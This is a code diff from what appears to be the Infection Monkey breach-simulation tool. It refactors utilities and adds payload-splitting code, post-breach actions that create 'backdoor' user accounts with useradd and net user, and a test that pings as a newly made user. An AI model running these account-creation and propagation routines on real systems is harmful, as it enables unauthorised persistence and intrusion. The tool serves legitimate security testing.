# Get monkey exe for host and it's path
|
||||
src_path = try_get_target_monkey(self.host)
|
||||
self.http_path, self.http_thread = MonkeyHTTPServer.try_create_locked_transfer(self.host, src_path)
|
||||
|
||||
def stop(self):
|
||||
if not self.http_path or not self.http_thread:
|
||||
raise RuntimeError("Can't stop http server that wasn't started!")
|
||||
self.http_thread.join(DOWNLOAD_TIMEOUT)
|
||||
self.http_thread.stop()
|
||||
|
|
|
@ -0,0 +1,63 @@
|
|||
import logging
|
||||
import textwrap
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class Payload(object):
|
||||
"""
|
||||
Class for defining and parsing a payload (commands with prefixes/suffixes)
|
||||
"""
|
||||
|
||||
def __init__(self, command, prefix="", suffix=""):
|
||||
self.command = command
|
||||
self.prefix = prefix
|
||||
self.suffix = suffix
|
||||
|
||||
def get_payload(self, command=""):
|
||||
"""
|
||||
Returns prefixed and suffixed command (payload)
|
||||
:param command: Command to suffix/prefix. If no command is passed than objects' property is used
|
||||
:return: prefixed and suffixed command (full payload)
|
||||
"""
|
||||
if not command:
|
||||
command = self.command
|
||||
return "{}{}{}".format(self.prefix, command, self.suffix)
|
||||
|
||||
|
||||
class LimitedSizePayload(Payload):
|
||||
"""
|
||||
Class for defining and parsing commands/payloads
|
||||
"""
|
||||
|
||||
def __init__(self, command, max_length, prefix="", suffix=""):
|
||||
"""
|
||||
:param command: command
|
||||
:param max_length: max length that payload(prefix + command + suffix) can have
|
||||
:param prefix: commands prefix
|
||||
:param suffix: commands suffix
|
||||
"""
|
||||
super(LimitedSizePayload, self).__init__(command, prefix, suffix)
|
||||
self.max_length = max_length
|
||||
|
||||
def is_suffix_and_prefix_too_long(self):
|
||||
return self.payload_is_too_long(self.suffix + self.prefix)
|
||||
|
||||
def split_into_array_of_smaller_payloads(self):
|
||||
if self.is_suffix_and_prefix_too_long():
|
||||
raise Exception("Can't split command into smaller sub-commands because commands' prefix and suffix already "
|
||||
"exceeds required length of command.")
|
||||
|
||||
elif self.command == "":
|
||||
return [self.prefix+self.suffix]
|
||||
wrapper = textwrap.TextWrapper(drop_whitespace=False, width=self.get_max_sub_payload_length())
|
||||
commands = [self.get_payload(part)
|
||||
for part
|
||||
in wrapper.wrap(self.command)]
|
||||
return commands
|
||||
|
||||
def get_max_sub_payload_length(self):
|
||||
return self.max_length - len(self.prefix) - len(self.suffix)
|
||||
|
||||
def payload_is_too_long(self, command):
|
||||
return len(command) >= self.max_length
|
|
@ -0,0 +1,32 @@
|
|||
from unittest import TestCase
|
||||
from payload_parsing import Payload, LimitedSizePayload
|
||||
|
||||
|
||||
class TestPayload(TestCase):
|
||||
def test_get_payload(self):
|
||||
test_str1 = "abc"
|
||||
test_str2 = "atc"
|
||||
payload = Payload(command="b", prefix="a", suffix="c")
|
||||
assert payload.get_payload() == test_str1 and payload.get_payload("t") == test_str2
|
||||
|
||||
def test_is_suffix_and_prefix_too_long(self):
|
||||
pld_fail = LimitedSizePayload("b", 2, "a", "c")
|
||||
pld_success = LimitedSizePayload("b", 3, "a", "c")
|
||||
assert pld_fail.is_suffix_and_prefix_too_long() and not pld_success.is_suffix_and_prefix_too_long()
|
||||
|
||||
def test_split_into_array_of_smaller_payloads(self):
|
||||
test_str1 = "123456789"
|
||||
pld1 = LimitedSizePayload(test_str1, max_length=16, prefix="prefix", suffix="suffix")
|
||||
array1 = pld1.split_into_array_of_smaller_payloads()
|
||||
test1 = bool(array1[0] == "prefix1234suffix" and
|
||||
array1[1] == "prefix5678suffix" and
|
||||
array1[2] == "prefix9suffix")
|
||||
|
||||
test_str2 = "12345678"
|
||||
pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix")
|
||||
array2 = pld2.split_into_array_of_smaller_payloads()
|
||||
test2 = bool(array2[0] == "prefix1234suffix" and
|
||||
array2[1] == "prefix5678suffix" and len(array2) == 2)
|
||||
|
||||
assert test1 and test2
|
||||
|
|
@ -8,7 +8,7 @@ import os
|
|||
import sys
|
||||
import traceback
|
||||
|
||||
import infection_monkey.utils as utils
|
||||
from infection_monkey.utils.monkey_log_path import get_dropper_log_path, get_monkey_log_path
|
||||
from infection_monkey.config import WormConfiguration, EXTERNAL_CONFIG_FILE
|
||||
from infection_monkey.dropper import MonkeyDrops
|
||||
from infection_monkey.model import MONKEY_ARG, DROPPER_ARG
|
||||
|
@ -79,10 +79,10 @@ def main():
|
|||
|
||||
try:
|
||||
if MONKEY_ARG == monkey_mode:
|
||||
log_path = utils.get_monkey_log_path()
|
||||
log_path = get_monkey_log_path()
|
||||
monkey_cls = InfectionMonkey
|
||||
elif DROPPER_ARG == monkey_mode:
|
||||
log_path = utils.get_dropper_log_path()
|
||||
log_path = get_dropper_log_path()
|
||||
monkey_cls = MonkeyDrops
|
||||
else:
|
||||
return True
|
||||
|
@ -127,8 +127,8 @@ def main():
|
|||
json.dump(json_dict, config_fo, skipkeys=True, sort_keys=True, indent=4, separators=(',', ': '))
|
||||
|
||||
return True
|
||||
except Exception:
|
||||
LOG.exception("Exception thrown from monkey's start function")
|
||||
except Exception as e:
|
||||
LOG.exception("Exception thrown from monkey's start function. More info: {}".format(e))
|
||||
finally:
|
||||
monkey.cleanup()
|
||||
|
||||
|
|
|
@ -7,7 +7,8 @@ import time
|
|||
from six.moves import xrange
|
||||
|
||||
import infection_monkey.tunnel as tunnel
|
||||
import infection_monkey.utils as utils
|
||||
from infection_monkey.utils.monkey_dir import create_monkey_dir, get_monkey_dir_path, remove_monkey_dir
|
||||
from infection_monkey.utils.monkey_log_path import get_monkey_log_path
|
||||
from infection_monkey.config import WormConfiguration
|
||||
from infection_monkey.control import ControlClient
|
||||
from infection_monkey.model import DELAY_DELETE_CMD
|
||||
|
@ -26,6 +27,7 @@ from infection_monkey.windows_upgrader import WindowsUpgrader
|
|||
from infection_monkey.post_breach.post_breach_handler import PostBreach
|
||||
from common.utils.attack_utils import ScanStatus
|
||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
|
||||
|
||||
__author__ = 'itamar'
|
||||
|
||||
|
@ -90,7 +92,7 @@ class InfectionMonkey(object):
|
|||
self.set_default_port()
|
||||
|
||||
# Create a dir for monkey files if there isn't one
|
||||
utils.create_monkey_dir()
|
||||
create_monkey_dir()
|
||||
|
||||
if WindowsUpgrader.should_upgrade():
|
||||
self._upgrading_to_64 = True
|
||||
|
@ -244,8 +246,8 @@ class InfectionMonkey(object):
|
|||
|
||||
@staticmethod
|
||||
def self_delete():
|
||||
status = ScanStatus.USED if utils.remove_monkey_dir() else ScanStatus.SCANNED
|
||||
T1107Telem(status, utils.get_monkey_dir_path()).send()
|
||||
status = ScanStatus.USED if remove_monkey_dir() else ScanStatus.SCANNED
|
||||
T1107Telem(status, get_monkey_dir_path()).send()
|
||||
|
||||
if WormConfiguration.self_delete_in_cleanup \
|
||||
and -1 == sys.executable.find('python'):
|
||||
|
@ -269,7 +271,7 @@ class InfectionMonkey(object):
|
|||
T1107Telem(status, sys.executable).send()
|
||||
|
||||
def send_log(self):
|
||||
monkey_log_path = utils.get_monkey_log_path()
|
||||
monkey_log_path = get_monkey_log_path()
|
||||
if os.path.exists(monkey_log_path):
|
||||
with open(monkey_log_path, 'r') as f:
|
||||
log = f.read()
|
||||
|
@ -300,7 +302,11 @@ class InfectionMonkey(object):
|
|||
return True
|
||||
else:
|
||||
LOG.info("Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__)
|
||||
|
||||
except ExploitingVulnerableMachineError as exc:
|
||||
LOG.error("Exception while attacking %s using %s: %s",
|
||||
machine, exploiter.__class__.__name__, exc)
|
||||
self.successfully_exploited(machine, exploiter)
|
||||
return True
|
||||
except Exception as exc:
|
||||
LOG.exception("Exception while attacking %s using %s: %s",
|
||||
machine, exploiter.__class__.__name__, exc)
|
||||
|
|
|
@ -10,7 +10,7 @@ import re
|
|||
from six.moves import range
|
||||
|
||||
from infection_monkey.pyinstaller_utils import get_binary_file_path
|
||||
from infection_monkey.utils import is_64bit_python
|
||||
from infection_monkey.utils.environment import is_64bit_python
|
||||
|
||||
DEFAULT_TIMEOUT = 10
|
||||
BANNER_READ = 1024
|
||||
|
|
|
@ -1,21 +1,16 @@
|
|||
import datetime
|
||||
from common.data.post_breach_consts import POST_BREACH_BACKDOOR_USER
|
||||
from infection_monkey.post_breach.pba import PBA
|
||||
from infection_monkey.config import WormConfiguration
|
||||
|
||||
|
||||
__author__ = 'danielg'
|
||||
|
||||
LINUX_COMMANDS = ['useradd', '-M', '--expiredate',
|
||||
datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER',
|
||||
WormConfiguration.user_to_add]
|
||||
|
||||
WINDOWS_COMMANDS = ['net', 'user', WormConfiguration.user_to_add,
|
||||
WormConfiguration.remote_user_pass,
|
||||
'/add', '/ACTIVE:NO']
|
||||
from infection_monkey.utils.users import get_commands_to_add_user
|
||||
|
||||
|
||||
class BackdoorUser(PBA):
|
||||
def __init__(self):
|
||||
super(BackdoorUser, self).__init__("Backdoor user",
|
||||
linux_cmd=' '.join(LINUX_COMMANDS),
|
||||
windows_cmd=WINDOWS_COMMANDS)
|
||||
linux_cmds, windows_cmds = get_commands_to_add_user(
|
||||
WormConfiguration.user_to_add,
|
||||
WormConfiguration.remote_user_pass)
|
||||
super(BackdoorUser, self).__init__(
|
||||
POST_BREACH_BACKDOOR_USER,
|
||||
linux_cmd=' '.join(linux_cmds),
|
||||
windows_cmd=windows_cmds)
|
||||
|
||||
|
|
|
@ -0,0 +1,143 @@
|
|||
import logging
|
||||
import os
|
||||
import random
|
||||
import string
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
import win32event
|
||||
|
||||
from infection_monkey.utils.windows.auto_new_user import AutoNewUser, NewUserError
|
||||
from common.data.post_breach_consts import POST_BREACH_COMMUNICATE_AS_NEW_USER
|
||||
from infection_monkey.post_breach.pba import PBA
|
||||
from infection_monkey.telemetry.post_breach_telem import PostBreachTelem
|
||||
from infection_monkey.utils.environment import is_windows_os
|
||||
from infection_monkey.utils.linux.users import get_linux_commands_to_delete_user, get_linux_commands_to_add_user
|
||||
|
||||
PING_TEST_DOMAIN = "google.com"
|
||||
|
||||
PING_WAIT_TIMEOUT_IN_MILLISECONDS = 20 * 1000
|
||||
|
||||
CREATED_PROCESS_AS_USER_PING_SUCCESS_FORMAT = "Created process '{}' as user '{}', and successfully pinged."
|
||||
CREATED_PROCESS_AS_USER_PING_FAILED_FORMAT = "Created process '{}' as user '{}', but failed to ping (exit status {})."
|
||||
|
||||
USERNAME = "somenewuser"
|
||||
PASSWORD = "N3WPa55W0rD!1"
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class CommunicateAsNewUser(PBA):
|
||||
"""
|
||||
This PBA creates a new user, and then pings google as that user. This is used for a Zero Trust test of the People
|
||||
pillar. See the relevant telemetry processing to see what findings are created.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super(CommunicateAsNewUser, self).__init__(name=POST_BREACH_COMMUNICATE_AS_NEW_USER)
|
||||
|
||||
def run(self):
|
||||
username = CommunicateAsNewUser.get_random_new_user_name()
|
||||
if is_windows_os():
|
||||
self.communicate_as_new_user_windows(username)
|
||||
else:
|
||||
self.communicate_as_new_user_linux(username)
|
||||
|
||||
@staticmethod
|
||||
def get_random_new_user_name():
|
||||
return USERNAME + ''.join(random.choice(string.ascii_lowercase) for _ in range(5))
|
||||
|
||||
def communicate_as_new_user_linux(self, username):
|
||||
try:
|
||||
# add user + ping
|
||||
linux_cmds = get_linux_commands_to_add_user(username)
|
||||
commandline = "ping -c 1 {}".format(PING_TEST_DOMAIN)
|
||||
linux_cmds.extend([";", "sudo", "-u", username, commandline])
|
||||
final_command = ' '.join(linux_cmds)
|
||||
exit_status = os.system(final_command)
|
||||
self.send_ping_result_telemetry(exit_status, commandline, username)
|
||||
# delete the user, async in case it gets stuck.
|
||||
_ = subprocess.Popen(
|
||||
get_linux_commands_to_delete_user(username), stderr=subprocess.STDOUT, shell=True)
|
||||
# Leaking the process on purpose - nothing we can do if it's stuck.
|
||||
except subprocess.CalledProcessError as e:
|
||||
PostBreachTelem(self, (e.output, False)).send()
|
||||
|
||||
def communicate_as_new_user_windows(self, username):
|
||||
# Importing these only on windows, as they won't exist on linux.
|
||||
import win32con
|
||||
import win32process
|
||||
import win32api
|
||||
|
||||
try:
|
||||
with AutoNewUser(username, PASSWORD) as new_user:
|
||||
# Using os.path is OK, as this is on windows for sure
|
||||
ping_app_path = os.path.join(os.environ["WINDIR"], "system32", "PING.exe")
|
||||
if not os.path.exists(ping_app_path):
|
||||
PostBreachTelem(self, ("{} not found.".format(ping_app_path), False)).send()
|
||||
return # Can't continue without ping.
|
||||
|
||||
try:
|
||||
# Open process as that user:
|
||||
# https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessasusera
|
||||
commandline = "{} {} {} {}".format(ping_app_path, PING_TEST_DOMAIN, "-n", "1")
|
||||
process_handle, thread_handle, _, _ = win32process.CreateProcessAsUser(
|
||||
new_user.get_logon_handle(), # A handle to the primary token that represents a user.
|
||||
None, # The name of the module to be executed.
|
||||
commandline, # The command line to be executed.
|
||||
None, # Process attributes
|
||||
None, # Thread attributes
|
||||
True, # Should inherit handles
|
||||
win32con.NORMAL_PRIORITY_CLASS, # The priority class and the creation of the process.
|
||||
None, # An environment block for the new process. If this parameter is NULL, the new process
|
||||
# uses the environment of the calling process.
|
||||
None, # CWD. If this parameter is NULL, the new process will have the same current drive and
|
||||
# directory as the calling process.
|
||||
win32process.STARTUPINFO() # STARTUPINFO structure.
|
||||
# https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-startupinfoa
|
||||
)
|
||||
|
||||
logger.debug(
|
||||
"Waiting for ping process to finish. Timeout: {}ms".format(PING_WAIT_TIMEOUT_IN_MILLISECONDS))
|
||||
|
||||
# Ignoring return code, as we'll use `GetExitCode` to determine the state of the process later.
|
||||
_ = win32event.WaitForSingleObject( # Waits until the specified object is signaled, or time-out.
|
||||
process_handle, # Ping process handle
|
||||
PING_WAIT_TIMEOUT_IN_MILLISECONDS # Timeout in milliseconds
|
||||
)
|
||||
|
||||
ping_exit_code = win32process.GetExitCodeProcess(process_handle)
|
||||
|
||||
self.send_ping_result_telemetry(ping_exit_code, commandline, username)
|
||||
except Exception as e:
|
||||
# If failed on 1314, it's possible to try to elevate the rights of the current user with the
|
||||
# "Replace a process level token" right, using Local Security Policy editing.
|
||||
PostBreachTelem(self, (
|
||||
"Failed to open process as user {}. Error: {}".format(username, str(e)), False)).send()
|
||||
finally:
|
||||
try:
|
||||
win32api.CloseHandle(process_handle)
|
||||
win32api.CloseHandle(thread_handle)
|
||||
except Exception as err:
|
||||
logger.error("Close handle error: " + str(err))
|
||||
except subprocess.CalledProcessError as err:
|
||||
PostBreachTelem(self, (
|
||||
"Couldn't create the user '{}'. Error output is: '{}'".format(username, str(err)),
|
||||
False)).send()
|
||||
except NewUserError as e:
|
||||
PostBreachTelem(self, (str(e), False)).send()
|
||||
|
||||
def send_ping_result_telemetry(self, exit_status, commandline, username):
|
||||
"""
|
||||
Parses the result of ping and sends telemetry accordingly.
|
||||
|
||||
:param exit_status: In both Windows and Linux, 0 exit code from Ping indicates success.
|
||||
:param commandline: Exact commandline which was executed, for reporting back.
|
||||
:param username: Username from which the command was executed, for reporting back.
|
||||
"""
|
||||
if exit_status == 0:
|
||||
PostBreachTelem(self, (
|
||||
CREATED_PROCESS_AS_USER_PING_SUCCESS_FORMAT.format(commandline, username), True)).send()
|
||||
else:
|
||||
PostBreachTelem(self, (
|
||||
CREATED_PROCESS_AS_USER_PING_FAILED_FORMAT.format(commandline, username, exit_status), False)).send()
|
|
@ -1,11 +1,12 @@
|
|||
import os
|
||||
import logging
|
||||
|
||||
from infection_monkey.utils import is_windows_os
|
||||
from common.data.post_breach_consts import POST_BREACH_FILE_EXECUTION
|
||||
from infection_monkey.utils.environment import is_windows_os
|
||||
from infection_monkey.post_breach.pba import PBA
|
||||
from infection_monkey.control import ControlClient
|
||||
from infection_monkey.config import WormConfiguration
|
||||
from infection_monkey.utils import get_monkey_dir_path
|
||||
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
|
||||
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
||||
from common.utils.attack_utils import ScanStatus
|
||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||
|
@ -27,7 +28,7 @@ class UsersPBA(PBA):
|
|||
Defines user's configured post breach action.
|
||||
"""
|
||||
def __init__(self):
|
||||
super(UsersPBA, self).__init__("File execution")
|
||||
super(UsersPBA, self).__init__(POST_BREACH_FILE_EXECUTION)
|
||||
self.filename = ''
|
||||
if not is_windows_os():
|
||||
# Add linux commands to PBA's
|
||||
|
|
|
@ -3,7 +3,7 @@ import subprocess
|
|||
|
||||
from common.utils.attack_utils import ScanStatus
|
||||
from infection_monkey.telemetry.post_breach_telem import PostBreachTelem
|
||||
from infection_monkey.utils import is_windows_os
|
||||
from infection_monkey.utils.environment import is_windows_os
|
||||
from infection_monkey.config import WormConfiguration
|
||||
from infection_monkey.telemetry.attack.t1064_telem import T1064Telem
|
||||
|
||||
|
@ -12,6 +12,7 @@ LOG = logging.getLogger(__name__)
|
|||
|
||||
__author__ = 'VakarisZ'
|
||||
|
||||
EXECUTION_WITHOUT_OUTPUT = "(PBA execution produced no output)"
|
||||
|
||||
class PBA(object):
|
||||
"""
|
||||
|
@ -20,7 +21,8 @@ class PBA(object):
|
|||
def __init__(self, name="unknown", linux_cmd="", windows_cmd=""):
|
||||
"""
|
||||
:param name: Name of post breach action.
|
||||
:param command: Command that will be executed on breached machine
|
||||
:param linux_cmd: Command that will be executed on breached machine
|
||||
:param windows_cmd: Command that will be executed on breached machine
|
||||
"""
|
||||
self.command = PBA.choose_command(linux_cmd, windows_cmd)
|
||||
self.name = name
|
||||
|
@ -73,7 +75,10 @@ class PBA(object):
|
|||
:return: Tuple of command's output string and boolean, indicating if it succeeded
|
||||
"""
|
||||
try:
|
||||
return subprocess.check_output(self.command, stderr=subprocess.STDOUT, shell=True), True
|
||||
output = subprocess.check_output(self.command, stderr=subprocess.STDOUT, shell=True)
|
||||
if not output:
|
||||
output = EXECUTION_WITHOUT_OUTPUT
|
||||
return output, True
|
||||
except subprocess.CalledProcessError as e:
|
||||
# Return error output of the command
|
||||
return e.output, False
|
||||
|
|
|
@ -3,7 +3,7 @@ import inspect
|
|||
import importlib
|
||||
from infection_monkey.post_breach.pba import PBA
|
||||
from infection_monkey.post_breach.actions import get_pba_files
|
||||
from infection_monkey.utils import is_windows_os
|
||||
from infection_monkey.utils.environment import is_windows_os
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
@ -25,8 +25,12 @@ class PostBreach(object):
|
|||
Executes all post breach actions.
|
||||
"""
|
||||
for pba in self.pba_list:
|
||||
pba.run()
|
||||
LOG.info("Post breach actions executed")
|
||||
try:
|
||||
LOG.debug("Executing PBA: '{}'".format(pba.name))
|
||||
pba.run()
|
||||
except Exception as e:
|
||||
LOG.error("PBA {} failed. Error info: {}".format(pba.name, e))
|
||||
LOG.info("All PBAs executed. Total {} executed.".format(len(self.pba_list)))
|
||||
|
||||
@staticmethod
|
||||
def config_to_pba_list():
|
||||
|
@ -45,7 +49,9 @@ class PostBreach(object):
|
|||
if ((m[1].__module__ == module.__name__) and issubclass(m[1], PBA))]
|
||||
# Get post breach action object from class
|
||||
for pba_class in pba_classes:
|
||||
LOG.debug("Checking if should run PBA {}".format(pba_class.__name__))
|
||||
if pba_class.should_run(pba_class.__name__):
|
||||
pba = pba_class()
|
||||
pba_list.append(pba)
|
||||
LOG.debug("Added PBA {} to PBA list".format(pba_class.__name__))
|
||||
return pba_list
|
||||
|
|
|
@ -62,7 +62,7 @@ a. Build sambacry binaries yourself
|
|||
a.1. Install gcc-multilib if it's not installed
|
||||
sudo apt-get install gcc-multilib
|
||||
a.2. Build the binaries
|
||||
cd [code location]/infection_monkey/monkey_utils/sambacry_monkey_runner
|
||||
cd [code location]/infection_monkey/exploit/sambacry_monkey_runner
|
||||
./build.sh
|
||||
|
||||
b. Download our pre-built sambacry binaries
|
||||
|
|
|
@ -1,62 +0,0 @@
|
|||
import os
|
||||
import shutil
|
||||
import struct
|
||||
import sys
|
||||
import tempfile
|
||||
|
||||
from infection_monkey.config import WormConfiguration
|
||||
|
||||
|
||||
def get_monkey_log_path():
|
||||
return os.path.expandvars(WormConfiguration.monkey_log_path_windows) if sys.platform == "win32" \
|
||||
else WormConfiguration.monkey_log_path_linux
|
||||
|
||||
|
||||
def get_dropper_log_path():
|
||||
return os.path.expandvars(WormConfiguration.dropper_log_path_windows) if sys.platform == "win32" \
|
||||
else WormConfiguration.dropper_log_path_linux
|
||||
|
||||
|
||||
def is_64bit_windows_os():
|
||||
"""
|
||||
Checks for 64 bit Windows OS using environment variables.
|
||||
"""
|
||||
return 'PROGRAMFILES(X86)' in os.environ
|
||||
|
||||
|
||||
def is_64bit_python():
|
||||
return struct.calcsize("P") == 8
|
||||
|
||||
|
||||
def is_windows_os():
|
||||
return sys.platform.startswith("win")
|
||||
|
||||
|
||||
def utf_to_ascii(string):
|
||||
# Converts utf string to ascii. Safe to use even if string is already ascii.
|
||||
udata = string.decode("utf-8")
|
||||
return udata.encode("ascii", "ignore")
|
||||
|
||||
|
||||
def create_monkey_dir():
|
||||
"""
|
||||
Creates directory for monkey and related files
|
||||
"""
|
||||
if not os.path.exists(get_monkey_dir_path()):
|
||||
os.mkdir(get_monkey_dir_path())
|
||||
|
||||
|
||||
def remove_monkey_dir():
|
||||
"""
|
||||
Removes monkey's root directory
|
||||
:return True if removed without errors and False otherwise
|
||||
"""
|
||||
try:
|
||||
shutil.rmtree(get_monkey_dir_path())
|
||||
return True
|
||||
except Exception:
|
||||
return False
|
||||
|
||||
|
||||
def get_monkey_dir_path():
|
||||
return os.path.join(tempfile.gettempdir(), WormConfiguration.monkey_dir_name)
|
|
@ -0,0 +1,18 @@
|
|||
import os
|
||||
import struct
|
||||
import sys
|
||||
|
||||
|
||||
def is_64bit_windows_os():
|
||||
"""
|
||||
Checks for 64 bit Windows OS using environment variables.
|
||||
"""
|
||||
return 'PROGRAMFILES(X86)' in os.environ
|
||||
|
||||
|
||||
def is_64bit_python():
|
||||
return struct.calcsize("P") == 8
|
||||
|
||||
|
||||
def is_windows_os():
|
||||
return sys.platform.startswith("win")
|
|
@ -0,0 +1,21 @@
|
|||
import datetime
|
||||
|
||||
|
||||
def get_linux_commands_to_add_user(username):
|
||||
return [
|
||||
'useradd',
|
||||
'-M', # Do not create homedir
|
||||
'--expiredate',
|
||||
datetime.datetime.today().strftime('%Y-%m-%d'),
|
||||
'--inactive',
|
||||
'0',
|
||||
'-c', # Comment
|
||||
'MONKEY_USER', # Comment
|
||||
username]
|
||||
|
||||
|
||||
def get_linux_commands_to_delete_user(username):
|
||||
return [
|
||||
'deluser',
|
||||
username
|
||||
]
|
|
@ -0,0 +1,29 @@
|
|||
import os
|
||||
import shutil
|
||||
import tempfile
|
||||
|
||||
from infection_monkey.config import WormConfiguration
|
||||
|
||||
|
||||
def create_monkey_dir():
|
||||
"""
|
||||
Creates directory for monkey and related files
|
||||
"""
|
||||
if not os.path.exists(get_monkey_dir_path()):
|
||||
os.mkdir(get_monkey_dir_path())
|
||||
|
||||
|
||||
def remove_monkey_dir():
|
||||
"""
|
||||
Removes monkey's root directory
|
||||
:return True if removed without errors and False otherwise
|
||||
"""
|
||||
try:
|
||||
shutil.rmtree(get_monkey_dir_path())
|
||||
return True
|
||||
except Exception:
|
||||
return False
|
||||
|
||||
|
||||
def get_monkey_dir_path():
|
||||
return os.path.join(tempfile.gettempdir(), WormConfiguration.monkey_dir_name)
|
|
@ -0,0 +1,14 @@
|
|||
import os
|
||||
import sys
|
||||
|
||||
from infection_monkey.config import WormConfiguration
|
||||
|
||||
|
||||
def get_monkey_log_path():
|
||||
return os.path.expandvars(WormConfiguration.monkey_log_path_windows) if sys.platform == "win32" \
|
||||
else WormConfiguration.monkey_log_path_linux
|
||||
|
||||
|
||||
def get_dropper_log_path():
|
||||
return os.path.expandvars(WormConfiguration.dropper_log_path_windows) if sys.platform == "win32" \
|
||||
else WormConfiguration.dropper_log_path_linux
|
|
@ -0,0 +1,10 @@
|
|||
from infection_monkey.utils.linux.users import get_linux_commands_to_add_user
|
||||
from infection_monkey.utils.windows.users import get_windows_commands_to_add_user
|
||||
|
||||
|
||||
def get_commands_to_add_user(username, password):
|
||||
linux_cmds = get_linux_commands_to_add_user(username)
|
||||
windows_cmds = get_windows_commands_to_add_user(username, password)
|
||||
return linux_cmds, windows_cmds
|
||||
|
||||
|
|
@ -0,0 +1,69 @@
|
|||
import logging
|
||||
import subprocess
|
||||
|
||||
from infection_monkey.post_breach.actions.add_user import BackdoorUser
|
||||
from infection_monkey.utils.windows.users import get_windows_commands_to_delete_user, get_windows_commands_to_add_user
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class NewUserError(Exception):
|
||||
pass
|
||||
|
||||
|
||||
class AutoNewUser(object):
|
||||
"""
|
||||
RAII object to use for creating and using a new user in Windows. Use with `with`.
|
||||
User will be created when the instance is instantiated.
|
||||
User will log on at the start of the `with` scope.
|
||||
User will log off and get deleted at the end of said `with` scope.
|
||||
|
||||
Example:
|
||||
# Created # Logged on
|
||||
with AutoNewUser("user", "pass") as new_user:
|
||||
...
|
||||
...
|
||||
# Logged off and deleted
|
||||
...
|
||||
"""
|
||||
def __init__(self, username, password):
|
||||
"""
|
||||
Creates a user with the username + password.
|
||||
:raises: subprocess.CalledProcessError if failed to add the user.
|
||||
"""
|
||||
self.username = username
|
||||
self.password = password
|
||||
|
||||
windows_cmds = get_windows_commands_to_add_user(self.username, self.password, True)
|
||||
_ = subprocess.check_output(windows_cmds, stderr=subprocess.STDOUT, shell=True)
|
||||
|
||||
def __enter__(self):
|
||||
# Importing these only on windows, as they won't exist on linux.
|
||||
import win32security
|
||||
import win32con
|
||||
|
||||
try:
|
||||
# Logon as new user: https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonusera
|
||||
self.logon_handle = win32security.LogonUser(
|
||||
self.username,
|
||||
".", # Use current domain.
|
||||
self.password,
|
||||
win32con.LOGON32_LOGON_INTERACTIVE, # Logon type - interactive (normal user).
|
||||
win32con.LOGON32_PROVIDER_DEFAULT) # Which logon provider to use - whatever Windows offers.
|
||||
except Exception as err:
|
||||
raise NewUserError("Can't logon as {}. Error: {}".format(self.username, str(err)))
|
||||
return self
|
||||
|
||||
def get_logon_handle(self):
|
||||
return self.logon_handle
|
||||
|
||||
def __exit__(self, exc_type, exc_val, exc_tb):
|
||||
# Logoff
|
||||
self.logon_handle.Close()
|
||||
|
||||
# Try to delete user
|
||||
try:
|
||||
_ = subprocess.Popen(
|
||||
get_windows_commands_to_delete_user(self.username), stderr=subprocess.STDOUT, shell=True)
|
||||
except Exception as err:
|
||||
raise NewUserError("Can't delete user {}. Info: {}".format(self.username, err))
|
|
@ -0,0 +1,18 @@
|
|||
def get_windows_commands_to_add_user(username, password, should_be_active=False):
|
||||
windows_cmds = [
|
||||
'net',
|
||||
'user',
|
||||
username,
|
||||
password,
|
||||
'/add']
|
||||
if not should_be_active:
|
||||
windows_cmds.append('/ACTIVE:NO')
|
||||
return windows_cmds
|
||||
|
||||
|
||||
def get_windows_commands_to_delete_user(username):
|
||||
return [
|
||||
'net',
|
||||
'user',
|
||||
username,
|
||||
'/delete']
|
|
@ -10,7 +10,7 @@ from infection_monkey.config import WormConfiguration
|
|||
from infection_monkey.control import ControlClient
|
||||
from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly
|
||||
from infection_monkey.model import MONKEY_CMDLINE_WINDOWS
|
||||
from infection_monkey.utils import is_windows_os, is_64bit_windows_os, is_64bit_python
|
||||
from infection_monkey.utils.environment import is_windows_os, is_64bit_windows_os, is_64bit_python
|
||||
|
||||
__author__ = 'itay.mizeretz'
|
||||
|
||||
|
|
|
@ -21,7 +21,7 @@ json_setup_logging(default_path=os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'isla
|
|||
logger = logging.getLogger(__name__)
|
||||
|
||||
from monkey_island.cc.app import init_app
|
||||
from monkey_island.cc.exporter_init import populate_exporter_list
|
||||
from monkey_island.cc.services.reporting.exporter_init import populate_exporter_list
|
||||
from monkey_island.cc.utils import local_ip_addresses
|
||||
from monkey_island.cc.environment.environment import env
|
||||
from monkey_island.cc.database import is_db_server_up, get_db_version
|
||||
|
|
|
@ -38,6 +38,8 @@ class Monkey(Document):
|
|||
ttl_ref = ReferenceField(MonkeyTtl)
|
||||
tunnel = ReferenceField("self")
|
||||
command_control_channel = EmbeddedDocumentField(CommandControlChannel)
|
||||
aws_instance_id = StringField(required=False) # This field only exists when the monkey is running on an AWS
|
||||
# instance. See https://github.com/guardicore/monkey/issues/426.
|
||||
|
||||
# LOGIC
|
||||
@staticmethod
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY
|
||||
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||
|
||||
|
||||
class AggregateFinding(Finding):
|
||||
@staticmethod
|
||||
def create_or_add_to_existing(test, status, events):
|
||||
"""
|
||||
Create a new finding or add the events to an existing one if it's the same (same meaning same status and same
|
||||
test).
|
||||
|
||||
